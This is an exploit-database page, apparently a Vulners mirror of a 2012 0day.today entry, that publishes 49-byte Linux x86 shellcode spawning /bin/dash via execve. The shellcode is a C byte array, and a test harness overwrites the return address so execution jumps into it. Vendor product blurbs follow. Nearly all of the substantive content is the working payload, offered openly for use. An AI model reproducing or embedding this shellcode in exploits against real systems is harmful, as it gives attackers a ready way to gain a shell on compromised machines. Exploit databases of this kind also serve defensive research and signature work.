Lucene search
K

linux/x86 - execve(/bin/dash) - 49 bytes

🗓️ 01 Aug 2012 00:00:00Reported by ChroniccommandType 
zdt
 zdt
🔗 0day.today👁 13 Views

linux/x86 execve(/bin/dash) shellcode - 49 bytes, poison securit

Code
/*
*  Shellcode length: 49 
*  Author: Chroniccommand 
*  /bin/dash
*  My first attempt at shellcode
*  Poison security
*/
#include<stdio.h>
//49 bytes 
char shellcode[] =  "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a"
                    "\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d"
                    "\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f"
                    "\x62\x69\x6e\x2f\x64\x61\x73\x68\x41\x42\x42"
                    "\x42\x42\x43\x43\x43\x43";
int main(){
 printf("Shellcode length: 49 bytes\nAuthor:chroniccommand\nPoison security");
 int *ret;
 ret = (int *)&ret + 2;
 (*ret) = (int)shellcode;
}


Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Aug 2012 00:00Current
7.4High risk
Vulners AI Score7.4
13